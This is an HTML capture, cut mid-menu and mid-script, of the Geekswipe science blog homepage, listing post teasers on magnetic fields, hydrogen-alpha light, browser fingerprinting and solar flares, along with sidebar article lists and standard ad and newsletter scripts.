menu-item-4769"><a href="https://geekswipe.net/health/">Health</a> <ul class="sub-menu"> <li id="menu-item-4770" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4770"><a href="https://geekswipe.net/health/body/">Body</a></li> <li id="menu-item-4771" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4771"><a href="https://geekswipe.net/health/mind/">Mind</a></li> <li id="menu-item-4772" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4772"><a href="https://geekswipe.net/health/sleep/">Sleep</a></li> </ul> </li> <li id="menu-item-6204" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6204"><a href="https://geekswipe.net/art/">Art</a> <ul class="sub-menu"> <li id="menu-item-6205" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6205"><a href="https://geekswipe.net/art/films/">Films</a></li> <li id="menu-item-6206" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6206"><a href="https://geekswipe.net/art/video-games/">Video Games</a></li> </ul> </li> <li id="menu-item-4800" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4800"><a href="https://geekswipe.net/curiosity/">Discussions</a></li> <li class="right" id="swiper-link"><a href="https://geekswipe.net/wp-login.php?redirect_to=https%3A%2F%2Fgeekswipe.net%2Fscience%2Fphysics%2Fcan-intense-magnetic-fields-affect-humans%2F">Log In</a></li></ul></div> <div class="container"> <div class="container-inner"> <div class="search-link"> <a href="https://geekswipe.net/?s=science"><i class="fa fa-search"></i></a> </div> </div><!--/.container-inner--> </div><!--/.container--> </nav><!--/#nav-topbar--> <div class="container group"> <div class="container-inner"> <div class="group pad"> <div id="sticker"> <h1 class="site-title"><a href="https://geekswipe.net/" rel="home"><img src="https://geekswipe.net/wp-content/uploads/2015/09/Geekswipe-Logo-STANDARD-Web.png" alt="Geekswipe"></a></h1> </div> <!-- Ha ha --> <div id="ha-ha"></div> <!-- Oh! Hi there... --> <div id="amplifier-box"> <div id="custom_html-7" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Responsive Header Ad --> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-9460485641009814" data-ad-slot="3208000282" data-ad-format="auto"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <div class="amp-up" id="backdrop"> <p class="amplify">Amplify your tech with the right audience! <a href="/advertise">Learn more</a>.</p> </div></div></div> </div><!--/#amplifier-box--> </div> </div><!--/.container-inner--> </div><!--/.container--> </header><!--/#header--> <div class="container" id="page"> <div class="container-inner"> <div class="main"> <div class="main-inner group"> <div class="content" id="swipe-home"> <div class="page-title pad group" id="geekswipe-network"> <h2 class="swipe-home">More from Geekswipe Network - <a href="https://swyde.com">Swyde</a></h2> <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="Twitter" href="http://www.twitter.com/geekswipe" target="_blank"><i class="fa fa-twitter" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="RSS" href="http://geekswipe.net/feed/" ><i class="fa fa-rss" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Email" href="http://geekswipe.net/subscribe" ><i class="fa fa-envelope" ></i></a></li></ul> </div><!--/.page-title--> <div class="pad group"> <div class="featured"> <article id="post-9483" class="group post-9483 post type-post status-publish format-standard has-post-thumbnail hentry category-computing tag-communication tag-internet tag-social-networks"> <div class="post-inner post-hover"> <div class="post-thumbnail"> <a href="https://geekswipe.net/technology/computing/what-happened-to-the-internet/" title="What Happened to the Internet?"> <img width="720" height="396" src="https://geekswipe.net/wp-content/uploads/2019/03/What-happened-to-the-internet-today-720x396.jpg" class="attachment-thumb-large size-thumb-large wp-post-image" alt="What happened to the internet today?" srcset="https://geekswipe.net/wp-content/uploads/2019/03/What-happened-to-the-internet-today-720x396.jpg 720w, https://geekswipe.net/wp-content/uploads/2019/03/What-happened-to-the-internet-today-768x422.jpg 768w, https://geekswipe.net/wp-content/uploads/2019/03/What-happened-to-the-internet-today-520x286.jpg 520w, https://geekswipe.net/wp-content/uploads/2019/03/What-happened-to-the-internet-today.jpg 1000w" sizes="(max-width: 720px) 100vw, 720px" /> </a> <h2 class="post-title"> <a href="https://geekswipe.net/technology/computing/what-happened-to-the-internet/" rel="bookmark" title="What Happened to the Internet?">What Happened to the Internet?</a> </h2><!--/.post-title--> </div><!--/.post-thumbnail--> </div><!--/.post-inner--> </article><!--/.post--> </div><!--/.featured--> <div class="post-list group"> <div class="post-row"> <article id="post-7345" class="group post-7345 post type-post status-publish format-standard has-post-thumbnail hentry category-physics tag-magnetism"> <div class="post-inner post-hover"> <div class="post-thumbnail"> <a href="https://geekswipe.net/science/physics/can-intense-magnetic-fields-affect-humans/" title="Can Strong Magnetic Fields Affect Humans?"> <img width="520" height="286" src="https://geekswipe.net/wp-content/uploads/2018/08/Magnetic-Compass-with-Magnetic-Field-Geekswipe-520x286.jpg" class="attachment-thumb-medium size-thumb-medium wp-post-image" alt="Artistic representation of magnetic fields around a magnetic compass." srcset="https://geekswipe.net/wp-content/uploads/2018/08/Magnetic-Compass-with-Magnetic-Field-Geekswipe-520x286.jpg 520w, https://geekswipe.net/wp-content/uploads/2018/08/Magnetic-Compass-with-Magnetic-Field-Geekswipe-768x422.jpg 768w, https://geekswipe.net/wp-content/uploads/2018/08/Magnetic-Compass-with-Magnetic-Field-Geekswipe-720x396.jpg 720w, https://geekswipe.net/wp-content/uploads/2018/08/Magnetic-Compass-with-Magnetic-Field-Geekswipe.jpg 1000w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div><!--/.post-thumbnail--> <h2 class="post-title"> <a href="https://geekswipe.net/science/physics/can-intense-magnetic-fields-affect-humans/" rel="bookmark" title="Can Strong Magnetic Fields Affect Humans?">Can Strong Magnetic Fields Affect Humans?</a> </h2><!--/.post-title--> <div class="post-meta group"> <p class="post-category"><a href="https://geekswipe.net/science/physics/" rel="category tag">Physics</a></p>&nbsp;&mdash; <p class="post-date">1 Aug, 2018</p>&nbsp;&middot; <a class="post-comments" href="https://geekswipe.net/science/physics/can-intense-magnetic-fields-affect-humans/#comments"><span>1 Comment </span></a> </div><!--/.post-meta--> <div class="entry excerpt"> <p>Humans are made up of blood. And blood has iron in it. So what happens if a human is placed inside a very strong magnetic field? Will it affect the human body in any way? In this edition of Geekswipe, we’re going to look into the types of magnetism that exist in the world, and how a human body would react to different strengths of magnetic fields.</p> </div><!--/.entry--> </div><!--/.post-inner--> </article><!--/.post--> <article id="post-7233" class="group post-7233 post type-post status-publish format-standard has-post-thumbnail hentry category-astronomy tag-light tag-sun"> <div class="post-inner post-hover"> <div class="post-thumbnail"> <a href="https://geekswipe.net/science/astronomy/hydrogen-alpha-explanation-and-applications/" title="What Is Hydrogen-alpha?"> <img width="520" height="286" src="https://geekswipe.net/wp-content/uploads/2018/03/Sun-Viewed-Through-Hydrogen-Alpha-Filter-520x286.jpg" class="attachment-thumb-medium size-thumb-medium wp-post-image" alt="" srcset="https://geekswipe.net/wp-content/uploads/2018/03/Sun-Viewed-Through-Hydrogen-Alpha-Filter-520x286.jpg 520w, https://geekswipe.net/wp-content/uploads/2018/03/Sun-Viewed-Through-Hydrogen-Alpha-Filter-768x422.jpg 768w, https://geekswipe.net/wp-content/uploads/2018/03/Sun-Viewed-Through-Hydrogen-Alpha-Filter-720x396.jpg 720w, https://geekswipe.net/wp-content/uploads/2018/03/Sun-Viewed-Through-Hydrogen-Alpha-Filter.jpg 1000w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div><!--/.post-thumbnail--> <h2 class="post-title"> <a href="https://geekswipe.net/science/astronomy/hydrogen-alpha-explanation-and-applications/" rel="bookmark" title="What Is Hydrogen-alpha?">What Is Hydrogen-alpha?</a> </h2><!--/.post-title--> <div class="post-meta group"> <p class="post-category"><a href="https://geekswipe.net/science/astronomy/" rel="category tag">Astronomy</a></p>&nbsp;&mdash; <p class="post-date">23 Mar, 2018</p>&nbsp;&middot; <a class="post-comments" href="https://geekswipe.net/science/astronomy/hydrogen-alpha-explanation-and-applications/#comments"><span>3 Comments </span></a> </div><!--/.post-meta--> <div class="entry excerpt"> <p>Hydrogen alpha is a specific wavelength of visible light at 656.281 nm. A hydrogen atom emits a photon at this specific wavelength when its electron jumps from an excited quantum state or electron shell or energy level of n=3 to a lower level of n=2. Explore what H-alpha is, and how it is applied in astronomy.</p> </div><!--/.entry--> </div><!--/.post-inner--> </article><!--/.post--> </div><div class="post-row"> <article id="post-7171" class="group post-7171 post type-post status-publish format-standard has-post-thumbnail hentry category-computing tag-internet tag-privacy tag-security tag-surveillance"> <div class="post-inner post-hover"> <div class="post-thumbnail"> <a href="https://geekswipe.net/technology/computing/information-leaked-by-browser-help-fingerprinting/" title="What Type of Information Is Leaked by Your Browser?"> <img width="520" height="286" src="https://geekswipe.net/wp-content/uploads/2018/01/Broswer-Information-Leaks-and-Tracking-Protection-Geekswipe-520x286.jpg" class="attachment-thumb-medium size-thumb-medium wp-post-image" alt="Photo of the &#039;tracking protection&#039; text from Firefox&#039;s private browsing window." srcset="https://geekswipe.net/wp-content/uploads/2018/01/Broswer-Information-Leaks-and-Tracking-Protection-Geekswipe-520x286.jpg 520w, https://geekswipe.net/wp-content/uploads/2018/01/Broswer-Information-Leaks-and-Tracking-Protection-Geekswipe-768x422.jpg 768w, https://geekswipe.net/wp-content/uploads/2018/01/Broswer-Information-Leaks-and-Tracking-Protection-Geekswipe-720x396.jpg 720w, https://geekswipe.net/wp-content/uploads/2018/01/Broswer-Information-Leaks-and-Tracking-Protection-Geekswipe.jpg 1000w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div><!--/.post-thumbnail--> <h2 class="post-title"> <a href="https://geekswipe.net/technology/computing/information-leaked-by-browser-help-fingerprinting/" rel="bookmark" title="What Type of Information Is Leaked by Your Browser?">What Type of Information Is Leaked by Your Browser?</a> </h2><!--/.post-title--> <div class="post-meta group"> <p class="post-category"><a href="https://geekswipe.net/technology/computing/" rel="category tag">Computing</a></p>&nbsp;&mdash; <p class="post-date">30 Jan, 2018</p>&nbsp;&middot; <a class="post-comments" href="https://geekswipe.net/technology/computing/information-leaked-by-browser-help-fingerprinting/#respond"><span>Comment </span></a> </div><!--/.post-meta--> <div class="entry excerpt"> <p>Explore the type of personal data that can be leaked or revealed by the modern web browsers with just a single visit to a website. Also find out how individual anonymized data are pieced together, to form a unique fingerprint of the user that can be tracked even across browsers.</p> </div><!--/.entry--> </div><!--/.post-inner--> </article><!--/.post--> <article id="post-6691" class="group post-6691 post type-post status-publish format-standard has-post-thumbnail hentry category-astronomy tag-earth tag-magnetism tag-sun"> <div class="post-inner post-hover"> <div class="post-thumbnail"> <a href="https://geekswipe.net/science/astronomy/how-solar-flares-work/" title="How Solar Flares Work?"> <img width="520" height="286" src="https://geekswipe.net/wp-content/uploads/2017/12/How-solar-flare-works-Geekswipe-520x286.jpg" class="attachment-thumb-medium size-thumb-medium wp-post-image" alt="Hypothetical rendition of intense solar flare activity" srcset="https://geekswipe.net/wp-content/uploads/2017/12/How-solar-flare-works-Geekswipe-520x286.jpg 520w, https://geekswipe.net/wp-content/uploads/2017/12/How-solar-flare-works-Geekswipe-768x422.jpg 768w, https://geekswipe.net/wp-content/uploads/2017/12/How-solar-flare-works-Geekswipe-720x396.jpg 720w, https://geekswipe.net/wp-content/uploads/2017/12/How-solar-flare-works-Geekswipe.jpg 1000w" sizes="(max-width: 520px) 100vw, 520px" /> </a> </div><!--/.post-thumbnail--> <h2 class="post-title"> <a href="https://geekswipe.net/science/astronomy/how-solar-flares-work/" rel="bookmark" title="How Solar Flares Work?">How Solar Flares Work?</a> </h2><!--/.post-title--> <div class="post-meta group"> <p class="post-category"><a href="https://geekswipe.net/science/astronomy/" rel="category tag">Astronomy</a></p>&nbsp;&mdash; <p class="post-date">12 Dec, 2017</p>&nbsp;&middot; <a class="post-comments" href="https://geekswipe.net/science/astronomy/how-solar-flares-work/#comments"><span>1 Comment </span></a> </div><!--/.post-meta--> <div class="entry excerpt"> <p>Explore how Sun powers itself and find out how solar flare works. Also, find out the difference between a solar flare and a Coronal Mass Ejection event.</p> </div><!--/.entry--> </div><!--/.post-inner--> </article><!--/.post--> </div><div class="post-row"></div> </div><!--/.post-list--> <nav class="pagination group"> <div class='wp-pagenavi' role='navigation'> <span class='pages'>Page 1 of 76</span><span aria-current='page' class='current'>1</span><span class='extend'>...</span><a class="larger page" title="Page 5" href="https://geekswipe.net/page/5/">5</a><a class="larger page" title="Page 10" href="https://geekswipe.net/page/10/">10</a><span class='extend'>...</span><a class="nextpostslink" rel="next" href="https://geekswipe.net/page/2/">Next</a><a class="last" href="https://geekswipe.net/page/76/">Last</a> </div> </nav><!--/.pagination--> </div><!--/.pad--> </div><!--/.content--> <div class="sidebar s1"> <a class="sidebar-toggle" title="Expand Sidebar"><i class="fa icon-sidebar-toggle"></i></a> <div class="sidebar-content"> <div id="cyntabs-4" class="widget widget_cyn_tabs"> <h3>Science</h3> <div class="cyn-tabs-container"> <ul id="tab-popular-4" class="cyn-tab group thumbs-enabled"> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/science/biology/what-happens-when-fruits-ripen/" title="What Happens When Fruits Ripen?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/11/Geekswipe-What-happens-when-fruits-ripen-photograph-by-Karthikeyan-KC-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="" srcset="https://geekswipe.net/wp-content/uploads/2014/11/Geekswipe-What-happens-when-fruits-ripen-photograph-by-Karthikeyan-KC-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/11/Geekswipe-What-happens-when-fruits-ripen-photograph-by-Karthikeyan-KC-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/science/biology/what-happens-when-fruits-ripen/" rel="bookmark" title="What Happens When Fruits Ripen?">What Happens When Fruits Ripen?</a></p> <p class="tab-item-date">Nov 2, 2014</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/science/biology/why-you-cant-hear-any-external-sounds-while-stretching-or-yawning/" title="Why You Can&#8217;t Hear Any External Sounds When You Stretch or Yawn?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/03/Geekswipe_Hearing_Yawning_Stretching_Res_2-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="" srcset="https://geekswipe.net/wp-content/uploads/2014/03/Geekswipe_Hearing_Yawning_Stretching_Res_2-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/03/Geekswipe_Hearing_Yawning_Stretching_Res_2-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/science/biology/why-you-cant-hear-any-external-sounds-while-stretching-or-yawning/" rel="bookmark" title="Why You Can&#8217;t Hear Any External Sounds When You Stretch or Yawn?">Why You Can&#8217;t Hear Any External Sounds When You Stretch or Yawn?</a></p> <p class="tab-item-date">Mar 12, 2014</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/science/biology/why-did-pirates-wear-eye-patches/" title="Why Did Pirates Wear Eye Patches?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/08/Geekswipe-Why-did-pirates-wear-eye-patches-res-flickr-1-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="" srcset="https://geekswipe.net/wp-content/uploads/2014/08/Geekswipe-Why-did-pirates-wear-eye-patches-res-flickr-1-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/08/Geekswipe-Why-did-pirates-wear-eye-patches-res-flickr-1-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/science/biology/why-did-pirates-wear-eye-patches/" rel="bookmark" title="Why Did Pirates Wear Eye Patches?">Why Did Pirates Wear Eye Patches?</a></p> <p class="tab-item-date">Aug 26, 2014</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/science/biology/how-to-grow-plants-on-mars/" title="How to Grow Plants on Mars?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2016/10/Grow-Plants-on-Mars-Geekswipe-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="crater ice on mars" srcset="https://geekswipe.net/wp-content/uploads/2016/10/Grow-Plants-on-Mars-Geekswipe-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2016/10/Grow-Plants-on-Mars-Geekswipe-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/science/biology/how-to-grow-plants-on-mars/" rel="bookmark" title="How to Grow Plants on Mars?">How to Grow Plants on Mars?</a></p> <p class="tab-item-date">Oct 24, 2016</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/science/biology/why-do-we-cry-the-science-of-crying/" title="Why Do We Cry? &#8211; The Science of Crying"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/05/Why-do-we-cry-Geekswipe-Res-1-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="" srcset="https://geekswipe.net/wp-content/uploads/2014/05/Why-do-we-cry-Geekswipe-Res-1-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/05/Why-do-we-cry-Geekswipe-Res-1-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/science/biology/why-do-we-cry-the-science-of-crying/" rel="bookmark" title="Why Do We Cry? &#8211; The Science of Crying">Why Do We Cry? &#8211; The Science of Crying</a></p> <p class="tab-item-date">May 25, 2014</p> </div> </li> </ul><!--/.cyn-tab--> </div> </div> <div id="custom_html-5" class="widget_text widget widget_custom_html"><h3>Advertisement</h3><div class="textwidget custom-html-widget"><div id="amplifier-box-sidebar"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Medium Rectangle --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-9460485641009814" data-ad-slot="3116988689"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <div class="amp-up" id="backdrop"> <p class="amplify">Amplify your tech with the right audience! <a href="/advertise">Learn more</a>.</p> </div> </div></div></div><div id="custom_html-2" class="widget_text widget widget_custom_html"><h3>Swiper Chat</h3><div class="textwidget custom-html-widget"><a href="https://discord.gg/vJjU95z" class="su-button su-button-style-default su-button-wide" style="color:#FFFFFF;background-color:#7289da;border-color:#5b6eae;border-radius:2px;-moz-border-radius:2px;-webkit-border-radius:2px" target="_self" rel="noopener noreferrer"><span style="color:#FFFFFF;padding:0px 20px;font-size:16px;line-height:32px;border-color:#9cace5;border-radius:2px;-moz-border-radius:2px;-webkit-border-radius:2px;text-shadow:none;-moz-text-shadow:none;-webkit-text-shadow:none"> Geekswipe Discord Server</span></a></div></div> </div><!--/.sidebar-content--> </div><!--/.sidebar--> <div class="sidebar s2"> <a class="sidebar-toggle" title="Expand Sidebar"><i class="fa icon-sidebar-toggle"></i></a> <div class="sidebar-content"> <div id="cyntabs-3" class="widget widget_cyn_tabs"> <h3>Aerospace</h3> <div class="cyn-tabs-container"> <ul id="tab-popular-3" class="cyn-tab group thumbs-enabled"> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/technology/aerospace/how-whitcomb-area-rule-works/" title="What Is an Area Rule and How Does It Work?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2016/06/F-102A-Area-Rule-Application-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="Comparison of the two F-102 variants where the right one is area ruled." srcset="https://geekswipe.net/wp-content/uploads/2016/06/F-102A-Area-Rule-Application-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2016/06/F-102A-Area-Rule-Application-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/technology/aerospace/how-whitcomb-area-rule-works/" rel="bookmark" title="What Is an Area Rule and How Does It Work?">What Is an Area Rule and How Does It Work?</a></p> <p class="tab-item-date">Jun 29, 2016</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/technology/aerospace/how-reaction-wheels-and-control-moment-gyros-work/" title="How Reaction Wheels and Control Moment Gyros Work?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2016/08/Control-Moment-Gyroscopes-Working-Geekswipe-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="" srcset="https://geekswipe.net/wp-content/uploads/2016/08/Control-Moment-Gyroscopes-Working-Geekswipe-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2016/08/Control-Moment-Gyroscopes-Working-Geekswipe-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/technology/aerospace/how-reaction-wheels-and-control-moment-gyros-work/" rel="bookmark" title="How Reaction Wheels and Control Moment Gyros Work?">How Reaction Wheels and Control Moment Gyros Work?</a></p> <p class="tab-item-date">Aug 3, 2016</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/technology/aerospace/can-a-commercial-airplane-fly-upside-down/" title="Can a Commercial Airplane Fly Upside Down?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/06/Geekswipe_Can-a-commercial-airplane-fly-upside-down_Res_Flight_1-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="Geekswipe_Can a commercial airplane fly upside down_Res_Flight_1" srcset="https://geekswipe.net/wp-content/uploads/2014/06/Geekswipe_Can-a-commercial-airplane-fly-upside-down_Res_Flight_1-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/06/Geekswipe_Can-a-commercial-airplane-fly-upside-down_Res_Flight_1-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/technology/aerospace/can-a-commercial-airplane-fly-upside-down/" rel="bookmark" title="Can a Commercial Airplane Fly Upside Down?">Can a Commercial Airplane Fly Upside Down?</a></p> <p class="tab-item-date">Jun 23, 2014</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/technology/aerospace/airbus-patent-cockpit-without-windows/" title="Airbus Filed a Patent for a Cockpit without Windows"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/07/cockpit-without-windows-airbus-patent-geekswipe-res-1-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="cockpit without windows" srcset="https://geekswipe.net/wp-content/uploads/2014/07/cockpit-without-windows-airbus-patent-geekswipe-res-1-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/07/cockpit-without-windows-airbus-patent-geekswipe-res-1-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/technology/aerospace/airbus-patent-cockpit-without-windows/" rel="bookmark" title="Airbus Filed a Patent for a Cockpit without Windows">Airbus Filed a Patent for a Cockpit without Windows</a></p> <p class="tab-item-date">Jul 4, 2014</p> </div> </li> <li> <div class="tab-item-thumbnail"> <a href="https://geekswipe.net/technology/aerospace/how-aerobatic-airplanes-fly-inverted/" title="How Aerobatic Airplanes Fly Inverted?"> <img width="160" height="160" src="https://geekswipe.net/wp-content/uploads/2014/07/Geekswipe-How-Aerobatic-Planes-Fly-Res-1-160x160.jpg" class="attachment-thumb-small size-thumb-small wp-post-image" alt="How Aerobatic Airplanes Fly Inverted?" srcset="https://geekswipe.net/wp-content/uploads/2014/07/Geekswipe-How-Aerobatic-Planes-Fly-Res-1-160x160.jpg 160w, https://geekswipe.net/wp-content/uploads/2014/07/Geekswipe-How-Aerobatic-Planes-Fly-Res-1-320x320.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /> </a> </div> <div class="tab-item-inner group"> <p class="tab-item-title"><a href="https://geekswipe.net/technology/aerospace/how-aerobatic-airplanes-fly-inverted/" rel="bookmark" title="How Aerobatic Airplanes Fly Inverted?">How Aerobatic Airplanes Fly Inverted?</a></p> <p class="tab-item-date">Jul 14, 2014</p> </div> </li> </ul><!--/.cyn-tab--> </div> </div> <div id="custom_html-4" class="widget_text widget widget_custom_html"><h3>Advertisement</h3><div class="textwidget custom-html-widget"><div id="amplifier-box-sidebar"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- Medium Rectangle --> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-9460485641009814" data-ad-slot="3116988689"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <div class="amp-up" id="backdrop"> <p class="amplify">Amplify your tech with the right audience! <a href="/advertise">Learn more</a>.</p> </div> </div></div></div><div id="text-25" class="widget widget_text"><h3>Subscribe</h3> <div class="textwidget"><script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- Mailchimp for WordPress v4.5.2 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-5307" method="post" data-id="5307" data-name="Default sign-up form" ><div class="mc4wp-form-fields"><div class="themeform"><a id="subscribe"><div style = "margin-bottom: 10px; margin-top: 15px;"><img src="https://geekswipe.net/wp-content/uploads/2015/07/Geekswipe-Subscribe.jpg" alt="Geekswipe Subscription" width="450" height="400" class="alignnone size-full wp-image-4279" /></div></a> <p><input type="email" style="display:inline-block; width:162px;" name="EMAIL" placeholder="email" required /> <input type="submit" value="⚡ Subscribe" /></p> </div></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1558022590" /><input type="hidden" name="_mc4wp_form_id" value="5307" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></div> </div> </div><!--/.sidebar-content--> </div><!--/.sidebar--> </div><!--/.main-inner--> </div><!--/.main--> </div><!--/.container-inner--> </div><!--/.container--> <footer id="footer"> <div class="container" id="footer-bottom"> <div class="container-inner"> <!-- <a id="back-to-top" href="#"><i class="fa fa-angle-up"></i></a> --> <div class="pad group"> <div class="grid one-half"> <div id ="geekswipe-description"> <p> Geekswipe covers science, groundbreaking breakthroughs, essential technologies, and geek culture. We answer scientific questions and help humans to explore.</p> </div> <div id="copyright"> <p>&copy;&nbsp;2019&nbsp;Geekswipe.&nbsp;All Rights Reserved.</p> </div><!--/#copyright--> </div> <div class="grid one-half last"> <div class="footer-links"><a href="https://geekswipe.net/about/">About</a>&nbsp;&nbsp;<a href="https://geekswipe.net/contact/">Contact</a>&nbsp;&nbsp;<a href="https://geekswipe.net/advertise/">Advertise</a>&nbsp;&nbsp;<a href="https://geekswipe.net/privacy/">Privacy</a>&nbsp;&nbsp;<a href="https://geekswipe.net/ask/">Ask Us a Science Question</a></div> <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="Twitter" href="http://www.twitter.com/geekswipe" target="_blank"><i class="fa fa-twitter" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="RSS" href="http://geekswipe.net/feed/" ><i class="fa fa-rss" ></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Email" href="http://geekswipe.net/subscribe" ><i class="fa fa-envelope" ></i></a></li></ul> </div> </div><!--/.pad--> </div><!--/.container-inner--> </div><!--/.container--> </footer><!--/#footer--> </div><!--/#wrapper--> <script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script><link rel='stylesheet' id='su-shortcodes-css' href='https://geekswipe.net/wp-content/plugins/shortcodes-ultimate/includes/css/shortcodes.css?ver=5.3.0' type='text/css' media='all' /> <script type='text/javascript' src='https://geekswipe.net/wp-content/themes/cynosure/js/jquery.fitvids.js?ver=5.2'></script> <script type='text/javascript' src='https://geekswipe.net/wp-content/themes/cynosure/js/scripts.js?ver=5.2'></script> <script type='text/javascript' src='https://geekswipe.net/wp-content/plugins/reduce-bounce-rate/js/analyticsjs.js?ver=5.2'></script> <script type='text/javascript' 